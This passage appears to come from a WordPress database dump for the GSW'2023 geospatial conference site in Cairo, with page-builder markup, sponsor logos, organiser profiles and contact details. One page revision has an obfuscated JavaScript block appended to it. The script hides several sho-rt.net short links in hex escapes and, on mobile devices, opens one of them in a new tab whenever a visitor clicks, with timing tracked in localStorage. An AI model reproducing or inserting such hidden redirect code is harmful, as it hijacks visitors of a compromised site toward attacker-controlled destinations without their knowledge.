link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-09 17:12:56','2023-06-09 17:12:56','',3066,'https://gsw2023.com/?p=4654',0,'revision','',0),
(4655,1,'2023-06-09 21:10:00','2023-06-09 21:10:00','','Terrasolid_logo_wide2_rgb_300dpi','','inherit','open','closed','','terrasolid_logo_wide2_rgb_300dpi','','','2023-06-09 21:10:00','2023-06-09 21:10:00','',3066,'https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi.png',0,'attachment','image/png',0),
(4656,1,'2023-06-09 21:18:54','2023-06-09 21:18:54','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345466084{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"343\" height=\"128\" /><br />\n</a></p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1685791591251{margin-top: 260px !important;}\"]</p>\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2271\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png\" alt=\"\" width=\"105\" height=\"104\" /></p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong>Prof. Ismail AbdelGhafar</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></p>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791357227{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong><img class=\"alignnone wp-image-4613\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/dr-alaa.jpg\" alt=\"\" width=\"80\" height=\"106\" /></strong></span></h4>\n<div class=\"aio-icon-header\">\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Prof. Dr. Alaa A. Abdelbary</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Chairman of the local organizing committee GSW2023, Egypt</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Vice President for Postgraduates Studies and Scientific Research</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Arab Academy for Science, Technology&amp; Maritime Transport</strong></span></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791546373{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><img class=\"alignnone wp-image-2272\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg\" alt=\"\" width=\"106\" height=\"106\" /></span></h4>\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\">Prof. Naser El-Sheimy</span></h4>\n</div>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>Geospatial Week Director ,The University of Calgary</strong></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text 